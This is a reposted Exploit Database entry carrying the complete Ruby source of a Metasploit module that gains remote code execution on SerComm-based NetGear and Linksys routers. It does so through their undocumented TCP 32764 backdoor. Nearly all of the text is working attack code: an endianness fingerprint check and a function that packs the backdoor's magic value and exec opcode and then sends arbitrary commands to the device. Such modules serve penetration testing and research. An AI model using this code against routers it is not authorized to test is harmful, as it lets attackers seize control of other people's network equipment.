SerComm Device – Remote Code Execution (Metasploit)

• Exploit Database
• 14 阅读

• 作者： Metasploit
  日期： 2014-01-14
• 类别：

  • remote
  平台：

  • hardware
• 来源：https://www.exploit-db.com/exploits/30915/

• ##
  # This module requires Metasploit: http//metasploit.com/download
  # Current source: https://github.com/rapid7/metasploit-framework
  ##
  
  require 'msf/core'
  
  class Metasploit3 < Msf::Exploit::Remote
  Rank = GreatRanking
  
  include Msf::Exploit::Remote::Tcp
  include Msf::Exploit::CmdStagerEcho
  
  def initialize(info={})
  super(update_info(info,
  'Name' => "SerComm Device Remote Code Execution",
  'Description'=> %q{
  This module will cause remote code execution on several SerComm devices.
  These devices typically include routers from NetGear and Linksys.
  Tested against NetGear DG834.
  },
  'License'=> MSF_LICENSE,
  'Author' =>
  [
  'Eloi Vanderbeken <eloi.vanderbeken[at]gmail.com>', # Initial discovery, poc
  'Matt "hostess" Andreko <mandreko[at]accuvant.com>' # Msf module
  ],
  'Payload'=>
  {
  'Space' => 10000, # Could be more, but this should be good enough
  'DisableNops' => true
  },
  'Platform' => 'linux',
  'Privileged' => false,
  'Targets'=>
  [
  ['Linux MIPS Big Endian',
  {
  'Arch' => ARCH_MIPSBE
  }
  ],
  ['Linux MIPS Little Endian',
  {
  'Arch' => ARCH_MIPSLE
  }
  ],
  ],
  'DefaultTarget'=> 0,
  'References' =>
  [
  [ 'OSVDB', '101653' ],
  [ 'URL', 'https://github.com/elvanderb/TCP-32764' ]
  ],
  'DisclosureDate' => "Dec 31 2013" ))
  
  register_options(
  [
  Opt::RPORT(32764)
  ], self.class)
  end
  
  def check
  fprint = endian_fingerprint
  
  case fprint
  when 'BE'
  print_status("Detected Big Endian")
  return Msf::Exploit::CheckCode::Vulnerable
  when 'LE'
  print_status("Detected Little Endian")
  return Msf::Exploit::CheckCode::Vulnerable
  end
  
  return Msf::Exploit::CheckCode::Unknown
  end
  
  def exploit
  execute_cmdstager(:noargs => true)
  end
  
  def endian_fingerprint
  begin
  connect
  
  sock.put(rand_text(5))
  res = sock.get_once
  
  disconnect
  
  if res && res.start_with?("MMcS")
  return 'BE'
  elsif res && res.start_with?("ScMM")
  return 'LE'
  end
  rescue Rex::ConnectionError => e
  print_error("Connection failed: #{e.class}: #{e}")
  end
  
  return nil
  end
  
  def execute_command(cmd, opts)
  vprint_debug(cmd)
  
  # Get the length of the command, for the backdoor's command injection
  cmd_length = cmd.length
  
  # 0x53634d4d=> Backdoor code
  # 0x07=> Exec command
  # cmd_length=> Length of command to execute, sent after communication struct
  data = [0x53634d4d, 0x07, cmd_length].pack("VVV")
  
  connect
  # Send command structure followed by command text
  sock.put(data+cmd)
  disconnect
  
  Rex.sleep(1)
  end
  
  end